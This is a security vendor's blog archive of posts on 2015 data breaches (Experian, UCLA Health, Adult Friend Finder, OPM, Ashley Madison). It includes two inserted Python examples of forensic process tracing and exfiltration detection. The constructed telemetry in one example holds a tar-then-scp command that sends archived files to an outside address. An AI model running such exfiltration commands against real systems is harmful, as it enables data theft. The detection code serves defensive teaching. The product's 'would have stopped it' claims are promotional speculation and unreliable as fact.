Monthly Archives: January 2016

Charles Leaver – In Order To Learn From Their Previous Errors Experian Need To Use Continuous Monitoring


Written By Josh Applebaum And Presented By Charles Leaver Ziften CEO

Experian Needs To Learn From Past Errors And Implement A Continuous Monitoring Solution

Working in the security sector, I've always felt my job was hard to explain to the average person. Over the last couple of years, that has changed. Regrettably, we are seeing a new data breach announced every few weeks, with many more that are kept quiet. These breaches are getting front page headlines, and I can now explain to my friends exactly what I do without losing them after a few sentences. Nevertheless, I still wonder what it is we are learning from all of this. As it turns out, many businesses are not learning from their own errors.

Experian, the global credit reporting agency, is a business with a lot to learn. Several months ago Experian announced it had discovered that its servers had been breached and that customer data had been taken. When Experian disclosed the breach it reassured consumers that "our consumer credit database was not accessed in this incident, and no credit card or banking info was taken." Although Experian took care in its announcement to assure consumers that their financial details had not been taken, it went on to list what data actually was stolen: customers' names, addresses, Social Security numbers, birth dates, driver's license numbers, military ID numbers, passport numbers, and additional information used in T-Mobile's own credit assessment. This is alarming for two reasons: the first is the kind of data that was taken; the second is that this is not the first time this has happened to Experian.

Although the hackers did not walk away with "payment card or banking details," they did walk away with personal data that could be used to open new credit card, banking, and other financial accounts. This alone is reason for the affected T-Mobile customers to be nervous. But all Experian customers should be a little worried.

As it turns out, this is not the first time Experian's servers have been compromised by hackers. In early 2014, T-Mobile announced that a "reasonably small" number of its customers had their personal details taken when Experian's servers were breached. Brian Krebs has a very well-written blog post about how the hackers breached the Experian servers the first time, so we won't go into too much detail here. In the first breach of Experian's servers, the hackers exploited a vulnerability in the organization's support ticket system, which was left exposed without requiring a user to authenticate before using it. Now the scary part: although it became widely known that the hackers used a vulnerability in the company's support ticket system to gain access, it wasn't until shortly after the second hack that the support ticket system was shut down.

It would be hard to believe it was a coincidence that Experian chose to shut down its support ticket system mere weeks after announcing it had been breached. If it wasn't a coincidence, then let's ask: what did Experian learn from the first breach, in which the attackers got away with sensitive customer data? Companies that store their customers' sensitive information must be held accountable not just for protecting that data, but also for making sure that, if breached, they plug the holes discovered while investigating the attack.

When businesses investigate a breach (or possible breach), it is important that they have access to historical data so investigators can piece together the puzzle of how the attack unfolded. At Ziften, we offer a solution that gives our customers a continuous, real-time view of everything that happens in their environment. In addition to providing real-time visibility for detecting attacks as they happen, our continuous monitoring system records all historical data so customers can "rewind the tape" and reconstruct what happened in their environment, no matter how far back they have to look. With this visibility, it is possible not only to discover that a breach occurred, but also to learn why it occurred, and hopefully to learn from past errors so they do not happen again.
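To make the "rewind the tape" idea concrete, here is an added example (not Ziften's code, and not the product's data model) of what retained endpoint telemetry lets an investigator do. It keeps a month of constructed process-start events for a hypothetical host `web01` running a hypothetical ticketing service `ticketd`, walks the parent chain of a suspicious process back to the service that spawned it, pulls the events around it, and reports how far back the history must reach to explain it. The record layout, host name, service name and addresses are all assumptions made for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set, Tuple

# Hypothetical endpoint telemetry record; field names are this example's own,
# not the schema of any particular product.
@dataclass(frozen=True)
class ProcessEvent:
    ts: datetime        # process start time (UTC)
    host: str
    pid: int
    ppid: int           # parent pid; 0 marks the root of the tree
    user: str
    image: str          # executable path
    cmdline: str

# Constructed sample telemetry for one host. The long-running service starts on
# day 0; the activity worth explaining happens 29 days later.
T0 = datetime(2015, 9, 1, 0, 0, 0)
EVENTS: List[ProcessEvent] = [
    ProcessEvent(T0, "web01", 1, 0, "root", "/sbin/init", "init"),
    ProcessEvent(T0 + timedelta(minutes=2), "web01", 2200, 1, "svc-ticket",
                 "/opt/ticketd/ticketd", "ticketd --listen 0.0.0.0:8080"),
    ProcessEvent(T0 + timedelta(days=27), "web01", 2340, 1, "root", "/usr/sbin/cron", "cron"),
    ProcessEvent(T0 + timedelta(days=29, hours=2), "web01", 3100, 2200, "svc-ticket",
                 "/bin/sh", "sh -c <redacted>"),
    ProcessEvent(T0 + timedelta(days=29, hours=2, seconds=5), "web01", 3101, 3100, "svc-ticket",
                 "/bin/tar", "tar czf /tmp/export.tgz /var/lib/ticketd/attachments"),
    ProcessEvent(T0 + timedelta(days=29, hours=2, seconds=40), "web01", 3102, 3100, "svc-ticket",
                 "/usr/bin/scp", "scp /tmp/export.tgz 203.0.113.7:/tmp/"),
]

SHELLS: Set[str] = {"/bin/sh", "/bin/bash", "/bin/dash"}


def index_by_pid(events: List[ProcessEvent], host: str) -> Dict[int, ProcessEvent]:
    # Assumption: a pid is not reused within the retained window on one host.
    # A real store would key on (host, pid, start time) to survive pid reuse.
    return {e.pid: e for e in events if e.host == host}


def ancestry(events: List[ProcessEvent], host: str, pid: int) -> List[ProcessEvent]:
    """Walk the parent chain from pid up to the root; returned root-first."""
    by_pid = index_by_pid(events, host)
    chain: List[ProcessEvent] = []
    seen: Set[int] = set()          # guards against cycles in bad telemetry
    cur: Optional[ProcessEvent] = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid) if cur.ppid != 0 else None
    return list(reversed(chain))


def rewind(events: List[ProcessEvent], host: str, end: datetime,
           lookback: timedelta) -> List[ProcessEvent]:
    """Events on host within [end - lookback, end], oldest first."""
    start = end - lookback
    return sorted((e for e in events if e.host == host and start <= e.ts <= end),
                  key=lambda e: e.ts)


def explain(events: List[ProcessEvent], host: str, pid: int) -> dict:
    """Summarize where a process came from and how much history was needed."""
    chain = ancestry(events, host, pid)
    if not chain:
        return {"chain": [], "origin": None, "history_needed": None}
    origin = chain[1] if len(chain) > 1 else chain[0]   # first ancestor below root
    return {"chain": [e.image for e in chain],
            "origin": origin,
            "history_needed": chain[-1].ts - origin.ts}


def shell_spawned_by_service(events: List[ProcessEvent], host: str,
                             service_images: Set[str]) -> List[Tuple[ProcessEvent, ProcessEvent]]:
    """A network service spawning an interactive shell is a classic sign of
    a web application being abused; return (parent, shell) pairs."""
    by_pid = index_by_pid(events, host)
    hits = []
    for e in events:
        if e.host == host and e.image in SHELLS:
            parent = by_pid.get(e.ppid)
            if parent is not None and parent.image in service_images:
                hits.append((parent, e))
    return hits


if __name__ == "__main__":
    summary = explain(EVENTS, "web01", 3102)
    print(" -> ".join(summary["chain"]))
    print("history needed to reach the origin:", summary["history_needed"])
    for parent, shell in shell_spawned_by_service(EVENTS, "web01", {"/opt/ticketd/ticketd"}):
        print(f"{parent.image} (pid {parent.pid}) spawned {shell.image} at {shell.ts}")
```

The point of `explain` is that the scp at day 29 is only understandable because the telemetry still holds the ticketd start from day 0: with a retention window of a week, the chain would stop at an orphaned shell and the question "which service was abused?" could not be answered.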


Charles Leaver – Isn’t It Time We Learned From Incidents Such As The UCLA Health Data Breach?


Written By Craig Hand And Presented By Ziften CEO Charles Leaver

UCLA Health Data Breach Probably Down To Inferior Security

UCLA Health announced on July 17th 2015 that it was the victim of a health data breach affecting as many as 4.5 million patients from the four hospitals it runs in the Southern California region. According to UCLA Health officials, Personally Identifiable Information (PII) and Protected Health Information (PHI) was accessed, but no evidence yet suggests that the data was stolen. This data went as far back as 1990. Officials also stated that there was no evidence, at this time, that any credit card or financial data was accessed.

"At this time" is the key phrase here. The data accessed (or potentially stolen; it's hard to know at this point) is essentially good for the life of that individual and potentially still useful after that individual's death. The data exposed to the criminals included: names, addresses, phone numbers, Social Security numbers, medical conditions, medications prescribed, medical procedures performed, and test results.

Little is known about this attack, as with so many others we hear about but never get any real details on. UCLA Health found unusual activity in parts of its network in October 2014 (although access potentially started one month earlier) and immediately contacted the FBI. By May 2015, a full seven months later, investigators concluded that a data breach had occurred. Again, officials claim that the attackers are probably highly sophisticated and based outside the country. Finally, we the public got to hear about the breach a full two months after that, on July 17, 2015.

It has been said many times before that we as security professionals need to be right 100% of the time, while the criminals only have to find the 1% we may not have been able to fix. Based on our research into the breach, the bottom line is that UCLA Health had inferior security practices. One indicator is the simple fact that the accessed data was not encrypted. We have had HIPAA for some time now, and UCLA is a well-renowned bastion of higher education, yet it still failed to secure data in the simplest ways. The claim that the attackers were highly advanced is also suspect, as so far no real evidence has been disclosed. After all, when was the last time a breached company declared that it wasn't the victim of a "sophisticated" attack? Even if they claim to have such evidence, we as members of the public will not get to see it and vet it properly.

Because there isn't enough disclosed detail about the breach, it's difficult to determine whether any system would have helped detect it sooner rather than later. However, if the breach began with malware being delivered to and executed by a UCLA Health network user, the likelihood that Ziften could have helped detect the malware, and potentially stop it, would have been fairly high. Ziften could also have alerted on suspicious, unknown, or known malware, as well as on any communications the malware made in order to spread internally or to exfiltrate data to an external host.

When are we going to learn? As we all know, it's not a matter of if, but when, companies will be attacked. Smart organizations are preparing for the inevitable with detection and response solutions that limit the damage.


Charles Leaver – Data Leak At Adult Friend Finder Preventable With Ziften Endpoint Security


Written By Chuck McAuley And Presented By Charles Leaver Ziften CEO

Endpoint Security Is The Best Friend For Adult Friend Finder

Adult Friend Finder, an online "dating service," and its affiliates were hacked in April. The breached information included credit card numbers, usernames, passwords, dates of birth, address details and personal, you know, preferences. What's frequently not highlighted in these cases is the monetary worth of such a breach. Many would argue that an email address and the associated data are of little value. However, much the same way metadata collection provides insight to the NSA, this type of information gives attackers plenty of leverage that can be used against the public. Spear phishing becomes a lot easier when attackers have not only an email address, but also location, language, and race. The source IP addresses collected can even provide pinpoint street locations for attacks.

The attack method used in this instance was not publicized, but it would be fair to assume that it leveraged some sort of SQL injection attack or similar, where data is pulled out of the back-end database through a flaw in the web server. Another possible mechanism could have been hijacking SSH keys from a compromised admin account or GitHub, but those tend to be secondary for the most part. Either way, the database dump itself is 570 Mb, and presuming the data was exfiltrated in a few big transactions, it would have been very visible at the network level. That is, if Adult Friend Finder had been using a solution that offered visibility into network traffic.

Ziften ZFlow™ enables network visibility into the cloud to catch aberrant data transfers and attribute them to specific executing processes. In this case, the administrator would have had two opportunities to observe the anomaly: 1) at the database level, as the data was extracted; 2) at the web server level, where an unusual quantity of traffic would be sent to a single address. Organizations like Adult Friend Finder must acquire the endpoint and network visibility required to secure their customers' personal data and "hook up" with a company like Ziften.
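The two observation points described above, and the malware communications mentioned in the UCLA Health post, come down to the same check: a per-process flow record whose volume dwarfs that process's normal behaviour. The following is an added example of that detection logic written for this post; it is not ZFlow code and does not use any Ziften data format. It constructs two days of ordinary flow records for a hypothetical `mysqld` on `db01` and `httpd` on `web01`, then appends two transfers on the order of the 570 Mb dump mentioned above (taken here as megabytes), one from the database to the web tier and one from the web server to a single external address, and flags both against a median baseline. Host names, process names, addresses and thresholds are all assumptions.

```python
import ipaddress
import statistics
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Hypothetical flow record as an endpoint agent might emit it: the agent has
# already attributed the connection to the local process that opened it.
@dataclass(frozen=True)
class Flow:
    ts: datetime
    host: str
    process: str
    dst: str
    bytes_out: int

INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
MB = 1_000_000


def is_internal(ip: str) -> bool:
    return any(ipaddress.ip_address(ip) in net for net in INTERNAL)


# Constructed sample data: 48 hourly flows per process of unremarkable size,
# followed by the two transfers the post says would have been visible.
T0 = datetime(2015, 4, 10, 0, 0)


def baseline_flows() -> List[Flow]:
    flows = []
    for h in range(48):
        flows.append(Flow(T0 + timedelta(hours=h), "db01", "mysqld", "10.0.1.20", 2 * MB + h * 10_000))
        flows.append(Flow(T0 + timedelta(hours=h), "web01", "httpd",
                          f"198.51.100.{h % 20 + 1}", 5 * MB + h * 20_000))
    return flows


ANOMALOUS = [
    Flow(T0 + timedelta(hours=48, minutes=3), "db01", "mysqld", "10.0.1.20", 570 * MB),   # database level
    Flow(T0 + timedelta(hours=48, minutes=9), "web01", "httpd", "203.0.113.7", 570 * MB),  # web server level
]
FLOWS = baseline_flows() + ANOMALOUS


@dataclass(frozen=True)
class Alert:
    flow: Flow
    baseline_bytes: float
    ratio: float
    external: bool      # destination outside the internal ranges: exfiltration candidate


def detect(flows: List[Flow], ratio_threshold: float = 20.0,
           min_bytes: int = 50 * MB, min_history: int = 10) -> List[Alert]:
    """Flag a flow whose size is many times the median of what the same
    (host, process) pair sent before it. The median is used as the baseline
    because a single earlier outlier barely moves it."""
    history: Dict[Tuple[str, str], List[int]] = {}
    alerts: List[Alert] = []
    for f in sorted(flows, key=lambda f: f.ts):
        hist = history.setdefault((f.host, f.process), [])
        if len(hist) >= min_history:              # no verdict until a baseline exists
            base = statistics.median(hist)
            ratio = f.bytes_out / base if base else float("inf")
            if f.bytes_out >= min_bytes and ratio >= ratio_threshold:
                alerts.append(Alert(f, base, ratio, not is_internal(f.dst)))
        hist.append(f.bytes_out)
    return alerts


def bytes_by_destination(flows: List[Flow], host: str, process: str,
                         since: datetime) -> List[Tuple[str, int]]:
    """Total bytes per destination for one process, largest first; answers
    'where did the unusual volume go?' once an alert has fired."""
    totals: Dict[str, int] = {}
    for f in flows:
        if f.host == host and f.process == process and f.ts >= since:
            totals[f.dst] = totals.get(f.dst, 0) + f.bytes_out
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    for a in detect(FLOWS):
        kind = "EXTERNAL" if a.external else "internal"
        print(f"{a.flow.ts} {a.flow.host}/{a.flow.process} -> {a.flow.dst}: "
              f"{a.flow.bytes_out / MB:.0f} MB, {a.ratio:.0f}x baseline ({kind})")
    print(bytes_by_destination(FLOWS, "web01", "httpd", T0 + timedelta(hours=47))[:3])
```

Because the baseline is kept per (host, process) rather than per host, the 570 MB from `mysqld` stands out even though the host as a whole may move that much in a day; and because the destination is classified, the web-server alert to a single external address ranks above the internal database-to-web-tier one, which is the same ordering of the "two opportunities" the post describes.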


Charles Leaver – The Preventable OPM Breach Caused Compromise Of Biometric Data


Written By Mike Hamilton And Presented By Ziften CEO Charles Leaver


Greater Security Protection of Personal and Biometric Data Required After OPM Breach

Recently, I had to go through a fairly comprehensive background check process. It was one of those situations where you sign into the portal, provide your Social Security number and a plethora of sensitive information about you and your family, and trust the federal government (and its contractors) to take care of that personal data.

When I got home the other evening and sat down to begin writing this blog post, I looked at the stack of mail lying on my desk and noticed one of those envelopes with the perforated edges that usually contain sensitive information.

Of course, you have to open those kinds of envelopes. Sadly, at that moment all my worst fears came to life.

What I found was a personal letter explaining that essentially every sensitive piece of information one might want to know about me, along with similar information on 21 million other Americans, was accessed during the OPM breach.

Oh, and incidentally, there's the problem that my biometric identity was also compromised.

At this point, although "federal professionals" believe that it's not a major issue, my iPhone disagrees with them. Bruce Schneier wrote an excellent piece on this, so I won't belabor the points he makes. But at some point we all have to ask some tough questions:

When is this going to stop?

Who is responsible for stopping it?

Who is actually going to stop it?

Who is going to be held accountable when breaches occur?

These kinds of attacks are why at Ziften we are so passionately developing our next-generation security tools. While we as a security vendor may never entirely stop or prevent these kinds of breaches, perhaps we can make them much more difficult and time consuming. When you think about it, until the community says "we can't take any more," this is going to continue to happen every day.

Charles Leaver – Ashley Madison Breach May Have Been Avoided With Ziften Endpoint Security


Written By Michael Vaughn And Presented By Charles Leaver Ziften CEO


Life is Too Short to Not Execute Endpoint Security.


Ashley Madison's tagline is "Life is short. Have an affair." It appears security falls a bit short at the company, however, as millions of customer records were blasted out for the entire world to see in a recent breach. Publicly, there are only theories as to who exactly infiltrated the outrageous operation. It might have been an insider. Other candidates, such as the notorious hacking group Impact Team, are claiming victory over the red-lettered company. What is clear is the publicly published list of thirty-two million user identities. Additionally, CEO Noel Biderman lost his position, and the company is facing an insurmountable number of lawsuits.

It has been discovered that bots were communicating with users, and that the user population included only a small number of women. Farcically, the site still states that it received a "Trusted Security Award" and offers complete discretion to its users. Its claim of "Over 42,705,000 confidential members!" on the home page is as outrageous as the service it offers. The stolen list of users is so readily accessible that third parties have already produced interactive sites with the names and addresses of the exposed cheaters. Per Ashley Madison's media page, they "instantly implemented a thorough investigation utilizing leading forensics professionals and other security experts to figure out the origin, nature, and impact of this incident." If Ashley Madison had been more proactive in its approach to endpoint security, it could potentially have been alerted to the breach and stopped it before data could be stolen.

Advanced endpoint security and forensic applications, such as those offered by Ziften, could potentially have spared this organization the embarrassment it has had to deal with. Not only could Ziften have alerted security leads to the suspect network events in the dead of night during an attack, it could also have prevented a range of actions on the database from being carried out, all while letting the security team sleep a little better. Life is too short to let security problems keep you awake at night.